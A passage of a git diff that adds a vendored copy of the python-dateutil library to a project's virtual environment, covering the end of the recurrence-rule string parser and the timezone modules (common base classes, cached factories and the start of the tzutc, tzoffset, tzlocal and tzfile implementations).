name, value, **kwargs): + """ + Two ways to specify this: +1MO or MO(+1) + """ + l = [] + for wday in value.split(','): + if '(' in wday: + # If it's of the form TH(+1), etc. + splt = wday.split('(') + w = splt[0] + n = int(splt[1][:-1]) + elif len(wday): + # If it's of the form +1MO + for i in range(len(wday)): + if wday[i] not in '+-0123456789': + break + n = wday[:i] or None + w = wday[i:] + if n: + n = int(n) + else: + raise ValueError("Invalid (empty) BYDAY specification.") + + l.append(weekdays[self._weekday_map[w]](n)) + rrkwargs["byweekday"] = l + + _handle_BYDAY = _handle_BYWEEKDAY + + def _parse_rfc_rrule(self, line, + dtstart=None, + cache=False, + ignoretz=False, + tzinfos=None): + if line.find(':') != -1: + name, value = line.split(':') + if name != "RRULE": + raise ValueError("unknown parameter name") + else: + value = line + rrkwargs = {} + for pair in value.split(';'): + name, value = pair.split('=') + name = name.upper() + value = value.upper() + try: + getattr(self, "_handle_"+name)(rrkwargs, name, value, + ignoretz=ignoretz, + tzinfos=tzinfos) + except AttributeError: + raise ValueError("unknown parameter '%s'" % name) + except (KeyError, ValueError): + raise ValueError("invalid '%s': %s" % (name, value)) + return rrule(dtstart=dtstart, cache=cache, **rrkwargs) + + def _parse_date_value(self, date_value, parms, rule_tzids, + ignoretz, tzids, tzinfos): + global parser + if not parser: + from dateutil import parser + + datevals = [] + value_found = False + TZID = None + + for parm in parms: + if parm.startswith("TZID="): + try: + tzkey = rule_tzids[parm.split('TZID=')[-1]] + except KeyError: + continue + if tzids is None: + from . 
import tz + tzlookup = tz.gettz + elif callable(tzids): + tzlookup = tzids + else: + tzlookup = getattr(tzids, 'get', None) + if tzlookup is None: + msg = ('tzids must be a callable, mapping, or None, ' + 'not %s' % tzids) + raise ValueError(msg) + + TZID = tzlookup(tzkey) + continue + + # RFC 5445 3.8.2.4: The VALUE parameter is optional, but may be found + # only once. + if parm not in {"VALUE=DATE-TIME", "VALUE=DATE"}: + raise ValueError("unsupported parm: " + parm) + else: + if value_found: + msg = ("Duplicate value parameter found in: " + parm) + raise ValueError(msg) + value_found = True + + for datestr in date_value.split(','): + date = parser.parse(datestr, ignoretz=ignoretz, tzinfos=tzinfos) + if TZID is not None: + if date.tzinfo is None: + date = date.replace(tzinfo=TZID) + else: + raise ValueError('DTSTART/EXDATE specifies multiple timezone') + datevals.append(date) + + return datevals + + def _parse_rfc(self, s, + dtstart=None, + cache=False, + unfold=False, + forceset=False, + compatible=False, + ignoretz=False, + tzids=None, + tzinfos=None): + global parser + if compatible: + forceset = True + unfold = True + + TZID_NAMES = dict(map( + lambda x: (x.upper(), x), + re.findall('TZID=(?P[^:]+):', s) + )) + s = s.upper() + if not s.strip(): + raise ValueError("empty string") + if unfold: + lines = s.splitlines() + i = 0 + while i < len(lines): + line = lines[i].rstrip() + if not line: + del lines[i] + elif i > 0 and line[0] == " ": + lines[i-1] += line[1:] + del lines[i] + else: + i += 1 + else: + lines = s.split() + if (not forceset and len(lines) == 1 and (s.find(':') == -1 or + s.startswith('RRULE:'))): + return self._parse_rfc_rrule(lines[0], cache=cache, + dtstart=dtstart, ignoretz=ignoretz, + tzinfos=tzinfos) + else: + rrulevals = [] + rdatevals = [] + exrulevals = [] + exdatevals = [] + for line in lines: + if not line: + continue + if line.find(':') == -1: + name = "RRULE" + value = line + else: + name, value = line.split(':', 1) + parms = name.split(';') + if not parms: + raise ValueError("empty property name") + name = parms[0] + parms = parms[1:] + if name == "RRULE": + for parm in parms: + raise ValueError("unsupported RRULE parm: "+parm) + rrulevals.append(value) + elif name == "RDATE": + for parm in parms: + if parm != "VALUE=DATE-TIME": + raise ValueError("unsupported RDATE parm: "+parm) + rdatevals.append(value) + elif name == "EXRULE": + for parm in parms: + raise ValueError("unsupported EXRULE parm: "+parm) + exrulevals.append(value) + elif name == "EXDATE": + exdatevals.extend( + self._parse_date_value(value, parms, + TZID_NAMES, ignoretz, + tzids, tzinfos) + ) + elif name == "DTSTART": + dtvals = self._parse_date_value(value, parms, TZID_NAMES, + ignoretz, tzids, tzinfos) + if len(dtvals) != 1: + raise ValueError("Multiple DTSTART values specified:" + + value) + dtstart = dtvals[0] + else: + raise ValueError("unsupported property: "+name) + if (forceset or len(rrulevals) > 1 or rdatevals + or exrulevals or exdatevals): + if not parser and (rdatevals or exdatevals): + from dateutil import parser + rset = rruleset(cache=cache) + for value in rrulevals: + rset.rrule(self._parse_rfc_rrule(value, dtstart=dtstart, + ignoretz=ignoretz, + tzinfos=tzinfos)) + for value in rdatevals: + for datestr in value.split(','): + rset.rdate(parser.parse(datestr, + ignoretz=ignoretz, + tzinfos=tzinfos)) + for value in exrulevals: + rset.exrule(self._parse_rfc_rrule(value, dtstart=dtstart, + ignoretz=ignoretz, + tzinfos=tzinfos)) + for value in exdatevals: + rset.exdate(value) + if 
compatible and dtstart: + rset.rdate(dtstart) + return rset + else: + return self._parse_rfc_rrule(rrulevals[0], + dtstart=dtstart, + cache=cache, + ignoretz=ignoretz, + tzinfos=tzinfos) + + def __call__(self, s, **kwargs): + return self._parse_rfc(s, **kwargs) + + +rrulestr = _rrulestr() + +# vim:ts=4:sw=4:et diff --git a/env/Lib/site-packages/dateutil/tz/__init__.py b/env/Lib/site-packages/dateutil/tz/__init__.py new file mode 100644 index 00000000..af1352c4 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/__init__.py @@ -0,0 +1,12 @@ +# -*- coding: utf-8 -*- +from .tz import * +from .tz import __doc__ + +__all__ = ["tzutc", "tzoffset", "tzlocal", "tzfile", "tzrange", + "tzstr", "tzical", "tzwin", "tzwinlocal", "gettz", + "enfold", "datetime_ambiguous", "datetime_exists", + "resolve_imaginary", "UTC", "DeprecatedTzFormatWarning"] + + +class DeprecatedTzFormatWarning(Warning): + """Warning raised when time zones are parsed from deprecated formats.""" diff --git a/env/Lib/site-packages/dateutil/tz/_common.py b/env/Lib/site-packages/dateutil/tz/_common.py new file mode 100644 index 00000000..e6ac1183 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/_common.py @@ -0,0 +1,419 @@ +from six import PY2 + +from functools import wraps + +from datetime import datetime, timedelta, tzinfo + + +ZERO = timedelta(0) + +__all__ = ['tzname_in_python2', 'enfold'] + + +def tzname_in_python2(namefunc): + """Change unicode output into bytestrings in Python 2 + + tzname() API changed in Python 3. It used to return bytes, but was changed + to unicode strings + """ + if PY2: + @wraps(namefunc) + def adjust_encoding(*args, **kwargs): + name = namefunc(*args, **kwargs) + if name is not None: + name = name.encode() + + return name + + return adjust_encoding + else: + return namefunc + + +# The following is adapted from Alexander Belopolsky's tz library +# https://github.com/abalkin/tz +if hasattr(datetime, 'fold'): + # This is the pre-python 3.6 fold situation + def enfold(dt, fold=1): + """ + Provides a unified interface for assigning the ``fold`` attribute to + datetimes both before and after the implementation of PEP-495. + + :param fold: + The value for the ``fold`` attribute in the returned datetime. This + should be either 0 or 1. + + :return: + Returns an object for which ``getattr(dt, 'fold', 0)`` returns + ``fold`` for all versions of Python. In versions prior to + Python 3.6, this is a ``_DatetimeWithFold`` object, which is a + subclass of :py:class:`datetime.datetime` with the ``fold`` + attribute added, if ``fold`` is 1. + + .. versionadded:: 2.6.0 + """ + return dt.replace(fold=fold) + +else: + class _DatetimeWithFold(datetime): + """ + This is a class designed to provide a PEP 495-compliant interface for + Python versions before 3.6. It is used only for dates in a fold, so + the ``fold`` attribute is fixed at ``1``. + + .. versionadded:: 2.6.0 + """ + __slots__ = () + + def replace(self, *args, **kwargs): + """ + Return a datetime with the same attributes, except for those + attributes given new values by whichever keyword arguments are + specified. Note that tzinfo=None can be specified to create a naive + datetime from an aware datetime with no conversion of date and time + data. + + This is reimplemented in ``_DatetimeWithFold`` because pypy3 will + return a ``datetime.datetime`` even if ``fold`` is unchanged. 
+ """ + argnames = ( + 'year', 'month', 'day', 'hour', 'minute', 'second', + 'microsecond', 'tzinfo' + ) + + for arg, argname in zip(args, argnames): + if argname in kwargs: + raise TypeError('Duplicate argument: {}'.format(argname)) + + kwargs[argname] = arg + + for argname in argnames: + if argname not in kwargs: + kwargs[argname] = getattr(self, argname) + + dt_class = self.__class__ if kwargs.get('fold', 1) else datetime + + return dt_class(**kwargs) + + @property + def fold(self): + return 1 + + def enfold(dt, fold=1): + """ + Provides a unified interface for assigning the ``fold`` attribute to + datetimes both before and after the implementation of PEP-495. + + :param fold: + The value for the ``fold`` attribute in the returned datetime. This + should be either 0 or 1. + + :return: + Returns an object for which ``getattr(dt, 'fold', 0)`` returns + ``fold`` for all versions of Python. In versions prior to + Python 3.6, this is a ``_DatetimeWithFold`` object, which is a + subclass of :py:class:`datetime.datetime` with the ``fold`` + attribute added, if ``fold`` is 1. + + .. versionadded:: 2.6.0 + """ + if getattr(dt, 'fold', 0) == fold: + return dt + + args = dt.timetuple()[:6] + args += (dt.microsecond, dt.tzinfo) + + if fold: + return _DatetimeWithFold(*args) + else: + return datetime(*args) + + +def _validate_fromutc_inputs(f): + """ + The CPython version of ``fromutc`` checks that the input is a ``datetime`` + object and that ``self`` is attached as its ``tzinfo``. + """ + @wraps(f) + def fromutc(self, dt): + if not isinstance(dt, datetime): + raise TypeError("fromutc() requires a datetime argument") + if dt.tzinfo is not self: + raise ValueError("dt.tzinfo is not self") + + return f(self, dt) + + return fromutc + + +class _tzinfo(tzinfo): + """ + Base class for all ``dateutil`` ``tzinfo`` objects. + """ + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + + dt = dt.replace(tzinfo=self) + + wall_0 = enfold(dt, fold=0) + wall_1 = enfold(dt, fold=1) + + same_offset = wall_0.utcoffset() == wall_1.utcoffset() + same_dt = wall_0.replace(tzinfo=None) == wall_1.replace(tzinfo=None) + + return same_dt and not same_offset + + def _fold_status(self, dt_utc, dt_wall): + """ + Determine the fold status of a "wall" datetime, given a representation + of the same datetime as a (naive) UTC datetime. This is calculated based + on the assumption that ``dt.utcoffset() - dt.dst()`` is constant for all + datetimes, and that this offset is the actual number of hours separating + ``dt_utc`` and ``dt_wall``. + + :param dt_utc: + Representation of the datetime as UTC + + :param dt_wall: + Representation of the datetime as "wall time". This parameter must + either have a `fold` attribute or have a fold-naive + :class:`datetime.tzinfo` attached, otherwise the calculation may + fail. + """ + if self.is_ambiguous(dt_wall): + delta_wall = dt_wall - dt_utc + _fold = int(delta_wall == (dt_utc.utcoffset() - dt_utc.dst())) + else: + _fold = 0 + + return _fold + + def _fold(self, dt): + return getattr(dt, 'fold', 0) + + def _fromutc(self, dt): + """ + Given a timezone-aware datetime in a given timezone, calculates a + timezone-aware datetime in a new timezone. 
+ + Since this is the one time that we *know* we have an unambiguous + datetime object, we take this opportunity to determine whether the + datetime is ambiguous and in a "fold" state (e.g. if it's the first + occurrence, chronologically, of the ambiguous datetime). + + :param dt: + A timezone-aware :class:`datetime.datetime` object. + """ + + # Re-implement the algorithm from Python's datetime.py + dtoff = dt.utcoffset() + if dtoff is None: + raise ValueError("fromutc() requires a non-None utcoffset() " + "result") + + # The original datetime.py code assumes that `dst()` defaults to + # zero during ambiguous times. PEP 495 inverts this presumption, so + # for pre-PEP 495 versions of python, we need to tweak the algorithm. + dtdst = dt.dst() + if dtdst is None: + raise ValueError("fromutc() requires a non-None dst() result") + delta = dtoff - dtdst + + dt += delta + # Set fold=1 so we can default to being in the fold for + # ambiguous dates. + dtdst = enfold(dt, fold=1).dst() + if dtdst is None: + raise ValueError("fromutc(): dt.dst gave inconsistent " + "results; cannot convert") + return dt + dtdst + + @_validate_fromutc_inputs + def fromutc(self, dt): + """ + Given a timezone-aware datetime in a given timezone, calculates a + timezone-aware datetime in a new timezone. + + Since this is the one time that we *know* we have an unambiguous + datetime object, we take this opportunity to determine whether the + datetime is ambiguous and in a "fold" state (e.g. if it's the first + occurrence, chronologically, of the ambiguous datetime). + + :param dt: + A timezone-aware :class:`datetime.datetime` object. + """ + dt_wall = self._fromutc(dt) + + # Calculate the fold status given the two datetimes. + _fold = self._fold_status(dt, dt_wall) + + # Set the default fold value for ambiguous dates + return enfold(dt_wall, fold=_fold) + + +class tzrangebase(_tzinfo): + """ + This is an abstract base class for time zones represented by an annual + transition into and out of DST. Child classes should implement the following + methods: + + * ``__init__(self, *args, **kwargs)`` + * ``transitions(self, year)`` - this is expected to return a tuple of + datetimes representing the DST on and off transitions in standard + time. + + A fully initialized ``tzrangebase`` subclass should also provide the + following attributes: + * ``hasdst``: Boolean whether or not the zone uses DST. + * ``_dst_offset`` / ``_std_offset``: :class:`datetime.timedelta` objects + representing the respective UTC offsets. + * ``_dst_abbr`` / ``_std_abbr``: Strings representing the timezone short + abbreviations in DST and STD, respectively. + * ``_hasdst``: Whether or not the zone has DST. + + .. 
versionadded:: 2.6.0 + """ + def __init__(self): + raise NotImplementedError('tzrangebase is an abstract base class') + + def utcoffset(self, dt): + isdst = self._isdst(dt) + + if isdst is None: + return None + elif isdst: + return self._dst_offset + else: + return self._std_offset + + def dst(self, dt): + isdst = self._isdst(dt) + + if isdst is None: + return None + elif isdst: + return self._dst_base_offset + else: + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + if self._isdst(dt): + return self._dst_abbr + else: + return self._std_abbr + + def fromutc(self, dt): + """ Given a datetime in UTC, return local time """ + if not isinstance(dt, datetime): + raise TypeError("fromutc() requires a datetime argument") + + if dt.tzinfo is not self: + raise ValueError("dt.tzinfo is not self") + + # Get transitions - if there are none, fixed offset + transitions = self.transitions(dt.year) + if transitions is None: + return dt + self.utcoffset(dt) + + # Get the transition times in UTC + dston, dstoff = transitions + + dston -= self._std_offset + dstoff -= self._std_offset + + utc_transitions = (dston, dstoff) + dt_utc = dt.replace(tzinfo=None) + + isdst = self._naive_isdst(dt_utc, utc_transitions) + + if isdst: + dt_wall = dt + self._dst_offset + else: + dt_wall = dt + self._std_offset + + _fold = int(not isdst and self.is_ambiguous(dt_wall)) + + return enfold(dt_wall, fold=_fold) + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + if not self.hasdst: + return False + + start, end = self.transitions(dt.year) + + dt = dt.replace(tzinfo=None) + return (end <= dt < end + self._dst_base_offset) + + def _isdst(self, dt): + if not self.hasdst: + return False + elif dt is None: + return None + + transitions = self.transitions(dt.year) + + if transitions is None: + return False + + dt = dt.replace(tzinfo=None) + + isdst = self._naive_isdst(dt, transitions) + + # Handle ambiguous dates + if not isdst and self.is_ambiguous(dt): + return not self._fold(dt) + else: + return isdst + + def _naive_isdst(self, dt, transitions): + dston, dstoff = transitions + + dt = dt.replace(tzinfo=None) + + if dston < dstoff: + isdst = dston <= dt < dstoff + else: + isdst = not dstoff <= dt < dston + + return isdst + + @property + def _dst_base_offset(self): + return self._dst_offset - self._std_offset + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s(...)" % self.__class__.__name__ + + __reduce__ = object.__reduce__ diff --git a/env/Lib/site-packages/dateutil/tz/_factories.py b/env/Lib/site-packages/dateutil/tz/_factories.py new file mode 100644 index 00000000..f8a65891 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/_factories.py @@ -0,0 +1,80 @@ +from datetime import timedelta +import weakref +from collections import OrderedDict + +from six.moves import _thread + + +class _TzSingleton(type): + def __init__(cls, *args, **kwargs): + cls.__instance = None + super(_TzSingleton, cls).__init__(*args, **kwargs) + + def __call__(cls): + if cls.__instance is None: + cls.__instance = super(_TzSingleton, cls).__call__() + return cls.__instance + + +class _TzFactory(type): + def instance(cls, *args, **kwargs): + """Alternate constructor that returns a fresh instance""" + return type.__call__(cls, *args, 
**kwargs) + + +class _TzOffsetFactory(_TzFactory): + def __init__(cls, *args, **kwargs): + cls.__instances = weakref.WeakValueDictionary() + cls.__strong_cache = OrderedDict() + cls.__strong_cache_size = 8 + + cls._cache_lock = _thread.allocate_lock() + + def __call__(cls, name, offset): + if isinstance(offset, timedelta): + key = (name, offset.total_seconds()) + else: + key = (name, offset) + + instance = cls.__instances.get(key, None) + if instance is None: + instance = cls.__instances.setdefault(key, + cls.instance(name, offset)) + + # This lock may not be necessary in Python 3. See GH issue #901 + with cls._cache_lock: + cls.__strong_cache[key] = cls.__strong_cache.pop(key, instance) + + # Remove an item if the strong cache is overpopulated + if len(cls.__strong_cache) > cls.__strong_cache_size: + cls.__strong_cache.popitem(last=False) + + return instance + + +class _TzStrFactory(_TzFactory): + def __init__(cls, *args, **kwargs): + cls.__instances = weakref.WeakValueDictionary() + cls.__strong_cache = OrderedDict() + cls.__strong_cache_size = 8 + + cls.__cache_lock = _thread.allocate_lock() + + def __call__(cls, s, posix_offset=False): + key = (s, posix_offset) + instance = cls.__instances.get(key, None) + + if instance is None: + instance = cls.__instances.setdefault(key, + cls.instance(s, posix_offset)) + + # This lock may not be necessary in Python 3. See GH issue #901 + with cls.__cache_lock: + cls.__strong_cache[key] = cls.__strong_cache.pop(key, instance) + + # Remove an item if the strong cache is overpopulated + if len(cls.__strong_cache) > cls.__strong_cache_size: + cls.__strong_cache.popitem(last=False) + + return instance + diff --git a/env/Lib/site-packages/dateutil/tz/tz.py b/env/Lib/site-packages/dateutil/tz/tz.py new file mode 100644 index 00000000..c67f56d4 --- /dev/null +++ b/env/Lib/site-packages/dateutil/tz/tz.py @@ -0,0 +1,1849 @@ +# -*- coding: utf-8 -*- +""" +This module offers timezone implementations subclassing the abstract +:py:class:`datetime.tzinfo` type. There are classes to handle tzfile format +files (usually are in :file:`/etc/localtime`, :file:`/usr/share/zoneinfo`, +etc), TZ environment string (in all known formats), given ranges (with help +from relative deltas), local machine timezone, fixed offset timezone, and UTC +timezone. +""" +import datetime +import struct +import time +import sys +import os +import bisect +import weakref +from collections import OrderedDict + +import six +from six import string_types +from six.moves import _thread +from ._common import tzname_in_python2, _tzinfo +from ._common import tzrangebase, enfold +from ._common import _validate_fromutc_inputs + +from ._factories import _TzSingleton, _TzOffsetFactory +from ._factories import _TzStrFactory +try: + from .win import tzwin, tzwinlocal +except ImportError: + tzwin = tzwinlocal = None + +# For warning about rounding tzinfo +from warnings import warn + +ZERO = datetime.timedelta(0) +EPOCH = datetime.datetime.utcfromtimestamp(0) +EPOCHORDINAL = EPOCH.toordinal() + + +@six.add_metaclass(_TzSingleton) +class tzutc(datetime.tzinfo): + """ + This is a tzinfo object that represents the UTC time zone. + + **Examples:** + + .. doctest:: + + >>> from datetime import * + >>> from dateutil.tz import * + + >>> datetime.now() + datetime.datetime(2003, 9, 27, 9, 40, 1, 521290) + + >>> datetime.now(tzutc()) + datetime.datetime(2003, 9, 27, 12, 40, 12, 156379, tzinfo=tzutc()) + + >>> datetime.now(tzutc()).tzname() + 'UTC' + + .. 
versionchanged:: 2.7.0 + ``tzutc()`` is now a singleton, so the result of ``tzutc()`` will + always return the same object. + + .. doctest:: + + >>> from dateutil.tz import tzutc, UTC + >>> tzutc() is tzutc() + True + >>> tzutc() is UTC + True + """ + def utcoffset(self, dt): + return ZERO + + def dst(self, dt): + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + return "UTC" + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + return False + + @_validate_fromutc_inputs + def fromutc(self, dt): + """ + Fast track version of fromutc() returns the original ``dt`` object for + any valid :py:class:`datetime.datetime` object. + """ + return dt + + def __eq__(self, other): + if not isinstance(other, (tzutc, tzoffset)): + return NotImplemented + + return (isinstance(other, tzutc) or + (isinstance(other, tzoffset) and other._offset == ZERO)) + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s()" % self.__class__.__name__ + + __reduce__ = object.__reduce__ + + +#: Convenience constant providing a :class:`tzutc()` instance +#: +#: .. versionadded:: 2.7.0 +UTC = tzutc() + + +@six.add_metaclass(_TzOffsetFactory) +class tzoffset(datetime.tzinfo): + """ + A simple class for representing a fixed offset from UTC. + + :param name: + The timezone name, to be returned when ``tzname()`` is called. + :param offset: + The time zone offset in seconds, or (since version 2.6.0, represented + as a :py:class:`datetime.timedelta` object). + """ + def __init__(self, name, offset): + self._name = name + + try: + # Allow a timedelta + offset = offset.total_seconds() + except (TypeError, AttributeError): + pass + + self._offset = datetime.timedelta(seconds=_get_supported_offset(offset)) + + def utcoffset(self, dt): + return self._offset + + def dst(self, dt): + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + return self._name + + @_validate_fromutc_inputs + def fromutc(self, dt): + return dt + self._offset + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + return False + + def __eq__(self, other): + if not isinstance(other, tzoffset): + return NotImplemented + + return self._offset == other._offset + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s(%s, %s)" % (self.__class__.__name__, + repr(self._name), + int(self._offset.total_seconds())) + + __reduce__ = object.__reduce__ + + +class tzlocal(_tzinfo): + """ + A :class:`tzinfo` subclass built around the ``time`` timezone functions. 
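+
+    A minimal, illustrative sketch of typical use (the zone names and
+    offsets returned depend entirely on the machine's local settings, so
+    treat the commented values as examples only):
+
+    .. code-block:: python3
+
+        >>> from datetime import datetime
+        >>> from dateutil.tz import tzlocal
+        >>> local = tzlocal()
+        >>> datetime(2016, 7, 7, 12, tzinfo=local).tzname()     # e.g. 'CEST'
+        >>> datetime(2016, 7, 7, 12, tzinfo=local).utcoffset()  # e.g. 2:00:00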
+ """ + def __init__(self): + super(tzlocal, self).__init__() + + self._std_offset = datetime.timedelta(seconds=-time.timezone) + if time.daylight: + self._dst_offset = datetime.timedelta(seconds=-time.altzone) + else: + self._dst_offset = self._std_offset + + self._dst_saved = self._dst_offset - self._std_offset + self._hasdst = bool(self._dst_saved) + self._tznames = tuple(time.tzname) + + def utcoffset(self, dt): + if dt is None and self._hasdst: + return None + + if self._isdst(dt): + return self._dst_offset + else: + return self._std_offset + + def dst(self, dt): + if dt is None and self._hasdst: + return None + + if self._isdst(dt): + return self._dst_offset - self._std_offset + else: + return ZERO + + @tzname_in_python2 + def tzname(self, dt): + return self._tznames[self._isdst(dt)] + + def is_ambiguous(self, dt): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. + + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + naive_dst = self._naive_is_dst(dt) + return (not naive_dst and + (naive_dst != self._naive_is_dst(dt - self._dst_saved))) + + def _naive_is_dst(self, dt): + timestamp = _datetime_to_timestamp(dt) + return time.localtime(timestamp + time.timezone).tm_isdst + + def _isdst(self, dt, fold_naive=True): + # We can't use mktime here. It is unstable when deciding if + # the hour near to a change is DST or not. + # + # timestamp = time.mktime((dt.year, dt.month, dt.day, dt.hour, + # dt.minute, dt.second, dt.weekday(), 0, -1)) + # return time.localtime(timestamp).tm_isdst + # + # The code above yields the following result: + # + # >>> import tz, datetime + # >>> t = tz.tzlocal() + # >>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname() + # 'BRDT' + # >>> datetime.datetime(2003,2,16,0,tzinfo=t).tzname() + # 'BRST' + # >>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname() + # 'BRST' + # >>> datetime.datetime(2003,2,15,22,tzinfo=t).tzname() + # 'BRDT' + # >>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname() + # 'BRDT' + # + # Here is a more stable implementation: + # + if not self._hasdst: + return False + + # Check for ambiguous times: + dstval = self._naive_is_dst(dt) + fold = getattr(dt, 'fold', None) + + if self.is_ambiguous(dt): + if fold is not None: + return not self._fold(dt) + else: + return True + + return dstval + + def __eq__(self, other): + if isinstance(other, tzlocal): + return (self._std_offset == other._std_offset and + self._dst_offset == other._dst_offset) + elif isinstance(other, tzutc): + return (not self._hasdst and + self._tznames[0] in {'UTC', 'GMT'} and + self._std_offset == ZERO) + elif isinstance(other, tzoffset): + return (not self._hasdst and + self._tznames[0] == other._name and + self._std_offset == other._offset) + else: + return NotImplemented + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s()" % self.__class__.__name__ + + __reduce__ = object.__reduce__ + + +class _ttinfo(object): + __slots__ = ["offset", "delta", "isdst", "abbr", + "isstd", "isgmt", "dstoffset"] + + def __init__(self): + for attr in self.__slots__: + setattr(self, attr, None) + + def __repr__(self): + l = [] + for attr in self.__slots__: + value = getattr(self, attr) + if value is not None: + l.append("%s=%s" % (attr, repr(value))) + return "%s(%s)" % (self.__class__.__name__, ", ".join(l)) + + def __eq__(self, other): + if not isinstance(other, _ttinfo): 
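+            # Returning NotImplemented (rather than False) lets Python fall
+            # back to the reflected comparison on the other operand.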
+ return NotImplemented + + return (self.offset == other.offset and + self.delta == other.delta and + self.isdst == other.isdst and + self.abbr == other.abbr and + self.isstd == other.isstd and + self.isgmt == other.isgmt and + self.dstoffset == other.dstoffset) + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __getstate__(self): + state = {} + for name in self.__slots__: + state[name] = getattr(self, name, None) + return state + + def __setstate__(self, state): + for name in self.__slots__: + if name in state: + setattr(self, name, state[name]) + + +class _tzfile(object): + """ + Lightweight class for holding the relevant transition and time zone + information read from binary tzfiles. + """ + attrs = ['trans_list', 'trans_list_utc', 'trans_idx', 'ttinfo_list', + 'ttinfo_std', 'ttinfo_dst', 'ttinfo_before', 'ttinfo_first'] + + def __init__(self, **kwargs): + for attr in self.attrs: + setattr(self, attr, kwargs.get(attr, None)) + + +class tzfile(_tzinfo): + """ + This is a ``tzinfo`` subclass that allows one to use the ``tzfile(5)`` + format timezone files to extract current and historical zone information. + + :param fileobj: + This can be an opened file stream or a file name that the time zone + information can be read from. + + :param filename: + This is an optional parameter specifying the source of the time zone + information in the event that ``fileobj`` is a file object. If omitted + and ``fileobj`` is a file stream, this parameter will be set either to + ``fileobj``'s ``name`` attribute or to ``repr(fileobj)``. + + See `Sources for Time Zone and Daylight Saving Time Data + `_ for more information. + Time zone files can be compiled from the `IANA Time Zone database files + `_ with the `zic time zone compiler + `_ + + .. note:: + + Only construct a ``tzfile`` directly if you have a specific timezone + file on disk that you want to read into a Python ``tzinfo`` object. + If you want to get a ``tzfile`` representing a specific IANA zone, + (e.g. ``'America/New_York'``), you should call + :func:`dateutil.tz.gettz` with the zone identifier. + + + **Examples:** + + Using the US Eastern time zone as an example, we can see that a ``tzfile`` + provides time zone information for the standard Daylight Saving offsets: + + .. testsetup:: tzfile + + from dateutil.tz import gettz + from datetime import datetime + + .. doctest:: tzfile + + >>> NYC = gettz('America/New_York') + >>> NYC + tzfile('/usr/share/zoneinfo/America/New_York') + + >>> print(datetime(2016, 1, 3, tzinfo=NYC)) # EST + 2016-01-03 00:00:00-05:00 + + >>> print(datetime(2016, 7, 7, tzinfo=NYC)) # EDT + 2016-07-07 00:00:00-04:00 + + + The ``tzfile`` structure contains a fully history of the time zone, + so historical dates will also have the right offsets. For example, before + the adoption of the UTC standards, New York used local solar mean time: + + .. doctest:: tzfile + + >>> print(datetime(1901, 4, 12, tzinfo=NYC)) # LMT + 1901-04-12 00:00:00-04:56 + + And during World War II, New York was on "Eastern War Time", which was a + state of permanent daylight saving time: + + .. 
doctest:: tzfile + + >>> print(datetime(1944, 2, 7, tzinfo=NYC)) # EWT + 1944-02-07 00:00:00-04:00 + + """ + + def __init__(self, fileobj, filename=None): + super(tzfile, self).__init__() + + file_opened_here = False + if isinstance(fileobj, string_types): + self._filename = fileobj + fileobj = open(fileobj, 'rb') + file_opened_here = True + elif filename is not None: + self._filename = filename + elif hasattr(fileobj, "name"): + self._filename = fileobj.name + else: + self._filename = repr(fileobj) + + if fileobj is not None: + if not file_opened_here: + fileobj = _nullcontext(fileobj) + + with fileobj as file_stream: + tzobj = self._read_tzfile(file_stream) + + self._set_tzdata(tzobj) + + def _set_tzdata(self, tzobj): + """ Set the time zone data of this object from a _tzfile object """ + # Copy the relevant attributes over as private attributes + for attr in _tzfile.attrs: + setattr(self, '_' + attr, getattr(tzobj, attr)) + + def _read_tzfile(self, fileobj): + out = _tzfile() + + # From tzfile(5): + # + # The time zone information files used by tzset(3) + # begin with the magic characters "TZif" to identify + # them as time zone information files, followed by + # sixteen bytes reserved for future use, followed by + # six four-byte values of type long, written in a + # ``standard'' byte order (the high-order byte + # of the value is written first). + if fileobj.read(4).decode() != "TZif": + raise ValueError("magic not found") + + fileobj.read(16) + + ( + # The number of UTC/local indicators stored in the file. + ttisgmtcnt, + + # The number of standard/wall indicators stored in the file. + ttisstdcnt, + + # The number of leap seconds for which data is + # stored in the file. + leapcnt, + + # The number of "transition times" for which data + # is stored in the file. + timecnt, + + # The number of "local time types" for which data + # is stored in the file (must not be zero). + typecnt, + + # The number of characters of "time zone + # abbreviation strings" stored in the file. + charcnt, + + ) = struct.unpack(">6l", fileobj.read(24)) + + # The above header is followed by tzh_timecnt four-byte + # values of type long, sorted in ascending order. + # These values are written in ``standard'' byte order. + # Each is used as a transition time (as returned by + # time(2)) at which the rules for computing local time + # change. + + if timecnt: + out.trans_list_utc = list(struct.unpack(">%dl" % timecnt, + fileobj.read(timecnt*4))) + else: + 